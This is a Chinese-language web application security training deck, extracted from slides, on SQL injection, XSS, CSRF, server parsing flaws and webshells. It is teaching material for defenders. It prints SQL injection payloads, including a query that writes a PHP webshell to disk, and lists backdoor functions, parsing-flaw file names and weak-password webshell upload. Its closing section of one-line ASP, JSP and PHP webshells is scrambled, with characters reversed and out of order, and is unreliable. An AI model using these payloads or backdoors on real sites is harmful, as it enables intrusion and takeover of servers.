WEB应用安全培训

1、WEB应用安全培训 常见WEB漏洞 常见WEB后门介绍 漏洞名称漏洞名称漏洞等级漏洞等级 SQL注入高危 跨站脚本攻击漏洞高危 Cookie欺骗高危 CSRF（跨站请求伪造）中危 Web信息泄露中危 权限问题中危 逻辑漏洞中危 第三方程序漏洞高危 Web服务器解析漏洞高危 弱口令高危 SSRF中危 常见的Web漏洞 SQL注入 漏洞介绍 由于程序中对用户输入检查不严格，用户可以提 交一段数据库查询代码，根据程序返回的结果， 获得某些他想得知的数据，这就是所谓的SQL Injection，即SQL注入。 原因分析 其本质是由于对输入检查不充分，导致SQL语句 将用户提交的非法数据当作语句的一部分

2、来执行 。 SQL注入 SQL注入分类： 按提交字符类型可分为： 数字型 字符型 搜索型 按HTTP提交方式可分为： GET、POST 、Cookie 按注入方式可分为： 盲注 、 union注 入、 报错注入、 基于时间注入 编码问题：宽字节注入 SQL注入 如何判断？ 1.单引号判断 2.数字型注入判断 and 1=1 and 1=2 and 1 is null and 1 is not null and user0 参数进行运算 +1 -1 +%2B 3.字符型注入判断 and 1=1 and 1=2 4.搜索型注入判断 test% and 1=1 and %= test% and 1=

3、2 and %= SQL注入-相关表 Sysobjects, syscolumns Information_schema. TABLES Table_schematable_name Information_schema. COLUMNS user_tab_columns user_tables SQL注入-盲注 Access and (select top 1 asc(mid(id,1,1) from admin)0 MSSQL and (select top 1 ascii(substring(password,1,1) from admin)0 Mysql And(select asci

4、i(substr(pass,1,1)from admin limit 1)0 oracle And(select ascii(substr(pass,1,1)form admin where rownum=1)0 SQL注入-报错 and (select top 1 name from sysobjects)=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2)x from information_schema.tables group by x)a)%23 |utl_inaddr.get_host_na

5、me(select banner from v$version where rownum=1) SQL注入 MySQL写文件 http:/ and 1=2 union select 1,2,4,5,6 into outfile C:/apache/htdocs/site/shell.php Load_file(读取文件的路径) SQL注入 搜索型注入 Select 相应字段 from 表名 where 搜索条件 Like 科技% and 1=1 and %=% 搜索关键字% and payload and %= SQL注入 自动化工具 SQLMAP SQL注入 自动化工具 Havij SQL注

6、入 自动化工具 Pangolin XSS跨站脚本攻击 漏洞介绍漏洞介绍 恶意攻击者往Web页面里插入恶意html代码， 当用户浏览该页之时，嵌入其中Web里面的html 代码会被执行，从而达到恶意攻击用户的特殊 目的。 XSS本质是在于执行脚本javascript/html等 攻击者的js能力越强攻击效果越惊人！ XSS漏洞分类：反射型XSS 存储型XSS XSS跨站脚本攻击 XSS的危害 通过XSS执行的javascript，可以做到 窃取你正在浏览的cookies信息 篡改你正在浏览的页面，注入误导信息 捕获你的所有操作，并发送给黑客 从定向到黑客的钓鱼站点 利用浏览器的漏洞控制你的机器

7、持久型跨站脚本攻击场景 1. 正常服务器信息 2. 服务器存储恶意代码 3. 用户浏览网页 4. 服务器将恶意代码返回给用户 5. 客户端浏览器执行恶意代码 Web服务器 重要通知 Re:沙发！ Re:地板？ Re:地下室沙发 Re:地下室地板-_-! Re：免费获取Q币！ 内容： 恶意代码 Re:谁又发垃圾广告啦 ？ 1 普通用户客户端 34 恶意代码 执行！ 5 攻击者 在论坛发帖子： 免费获取Q币！ 恶意代码 2 XSS跨站脚本攻击 注册用户发帖，内容如下所示 XSS跨站脚本攻击 Admin用户登录浏览刚才的帖子 非持久型跨站脚本攻击场景 浏览器浏览器Outlook 正常访问 恶意代码

8、隐藏在链 接中 “reflected” 代码 1 From: 攻击者 To: 用户 免费赠送Q币！ ！ CLICK HERE 恶意代码 安全上下文: 目标站点 普通合法会话 安全上下文: 目标站点 攻击者 Web服务器 普通用户客户端 1 2 3 4 5 恶意代码 执行！ XSS跨站脚本攻击 反射型XSS XSS跨站脚本攻击 XSS攻击平台 CSRF跨站请求伪造 CSRF是什么？ nCSRF（Cross-site request forgery）跨站请求伪造 。 n你这可以这么理解CSRF攻击：攻击者盗用了你的身 份，以你的名义发送恶意请求。CSRF能够做的事情包 括：以你名义发送邮件，发消息

9、，盗取你的账号，甚至 于购买商品，虚拟货币转账.造成的问题包括：个人 隐私泄露以及财产安全。 跨站请求伪造(CSRF)场景 攻击者：小明 受害人：老王 银行网站： 恶意网站：www.B.com 1.A银行转账链接： http:/ 661.jpg IIS6.0 默认的可执行文件除了asp还包含这三种 /test.asa /test.cer /test.cdx 解析漏洞 Apache解析漏洞 Apache 是从右到左开始判断解析，如果为 不 可识别解析，就再往左判断。 /test.php.xxx /test.php.rar 解析漏洞 Nginx解析漏洞 影响版本:0.5.,0.6., 0.7 =

10、0.7.65, 0.8 = 0.8.37 /test.jpg/1.php /test.jpg%00.php 第三方漏洞 FCKeditor 编辑器上传漏洞，任意创建文件漏洞 eWebEeditor编辑器，上传漏洞，遍历目录漏洞 ThinkPHP任意代码执行漏洞 Struts2远程命令执行漏洞 Web中间件（Tomcat、Weblogic、Jboss） Struts2远程命令执行 tomcat JBoss Fckeditor/ewebeditor/kindeditor 遍历目录 上传漏洞 构造相应语句 弱口令 什么是弱口令？什么是弱口令？ 弱口令(weak password) 没有严格和准确的定

11、义 ，通常认为容易被别人（他们有可能对你很了解 ）猜测到或被破解工具破解的口令均为弱口令。 弱口令指的是仅包含简单数字和字母的口令，例 如“123”、“abc”等，因为这样的口令很容易被 别人破解，从而使用户的计算机面临风险，因此 不推荐用户使用。 弱口令 TOMCAT弱口令直接上传弱口令直接上传WEBSHELL 弱口令 针对弱口令的爆破针对弱口令的爆破 Burpsuite、Hydra等等 常见WEB后门介绍 什么是WEBSHELL？ 顾名思义，“web”的含义是显然需要服务器开放web服务 “shell”的含义是取得对服务器某种程度上操作权限。 webshell 常常被称为匿名用户（入侵者）

12、通过网站端口对网站服务器 的某种程度上操作的权限。由于webshell其大多是以动态脚 本 的形式出现，也有人称之为网站的后门工具。 常见WEB后门介绍 PHP后门木马常用函数 执行系统命令: system(), passthru(), shell_exec(), exec(), popen(), proc_open() 代码执行与加密: eval(), assert(), call_user_func(),base64_decode(), gzinflate(), gzuncompress(), gzdecode(), str_rot13() 文件包含与生成: require(), requ

13、ire_once(), include(), include_once(), file_get_contents(), file_put_contents(), fputs(), fwrite() WEB后门介绍 最常见的一句话木马： 隐蔽的一句话木马： 完全无特征一句话木马： http:/localhost/test.php?1=assert 密码：2 % ) )fequest(.MapPath(ReAs(Serverles(0).SavRequest.FiThen 0 les.Count Request.Fi If % ); )fequest.MapPath(ReAs(Serverles0

14、.SavRequest.Fi 0)=!iles.Count(Request.F %if);%unsafe,wtem(Request.IWrite(eval%Response.% false=equest validateRJscript=Language Page %);%unsafe,passest.Item%eval(RequJscript%=Language Page %();).getBytest(tParameterrequest.ge).write(f(tParameterrequest.ge+)RealPath(cation.getream(applileOutputStjava

15、.io.Fi null)(new=)!fter(.getParameif(request% 一句 话句话JSP 限制的一句话?/scriptphp=languagescript /OO? );error,h,$_POST/email/eace(preg_repl ?php)?sc,$_POSTsb($_POSTsa?$_POST?);sb($_POSTsa?$_POST?OSTsb);assert($_P ?phpSTsb)?eval($_PO ?phpTsb)?eval($_POS ?php% );)+名字(lcx.性别lcx. ;请叫我一声老大 : 昵称 ,18 : 年龄 eval, : 性别 ),#rm(Request.fo : 名字 =lcx var %=65001%CODEPAGE JAVASCRIPT=%LANGUAGE if end )sbrequest( balExecuteGlo then )sbRequest( if )%sbrequest( obal%ExecuteGl)%sbrequest